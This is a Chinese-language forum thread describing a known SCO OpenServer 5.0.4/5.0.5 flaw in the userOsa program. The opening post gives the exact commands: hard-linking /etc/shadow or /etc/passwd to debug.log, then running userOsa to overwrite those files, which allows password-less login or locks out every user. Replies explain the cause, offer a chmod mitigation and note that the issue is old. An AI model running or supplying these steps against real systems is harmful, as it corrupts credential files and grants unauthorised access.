SCO OpenServer 5 的大漏洞

无生相

sco unix有一个大bug
1.进入一个你可以写的目录。
2. ln /etc/shadow debug.log
3. /etc/sysadm.d/bin/userOsa >;>;bab
............................
则你的/etc/shadow文件已经被覆盖。任何人可以以任何帐户登录无须密码.
若第二步改为ln /etc/passwd debug.log 则谁也登不上来了！
>;>;bab 是任意敲入的
..........................是程序的显示
注意整个过程中不要离开当前可写目录！
已在unix 5.0.5 &5.0.4上验证。

原理：

SCO /etc/sysadm.d/bin/userOsa 这个程序在运行时会生成一个名叫
debug.log的文件这个文件用户属于root 组属于auth
与shadow文件的一致，而且此程序有BUG不会检查用户权限，因此可以覆盖任何文件，包括passwd和shadow.你在一个可写目录中建立连接(ln命令)将某个文件指向debug.log文件运行userOsa时它将出错信息写入log文件时实际上就覆盖了那个你想破坏的文件！

对于一些机器可以，但是有些SCO机器不知为何

如果SHADOW或PASSWORD文件不能联结，对于一些机器可以，但是有些SCO机器不知为何，不允许我LN这两个文件，报错，不知为何？
答：理论上只要对目录/etc 有读权限，就可以链接。在此例中估计必须用硬链接，若用符号链接ln -s 会因为权限问题未遂。
答复者：Mike Wolf

防范对策

chmod o-x userOsa即可

MicroHard

这个问题SCO发布很久了呀！

zyr2288

在本论坛我是第三次见到！

htldm

无生相朋友的帖子的确以前别人发过多次了，不过还是积极支持你。对新朋友是非常好的学习资料，对老朋友来说，也是温故而知新嘛。

lovqing

[quote]原帖由 "zyr2288"]在本论坛我是第三次见到！[/quote 发表：


我隻看到兩次

jzstorm

呵呵，我是第一次看到，不过我是新手。应该不为错吧。

无生相

我也见到过，只是贴出来要大家注意系统的安全，呵呵，现在的系统不安全阿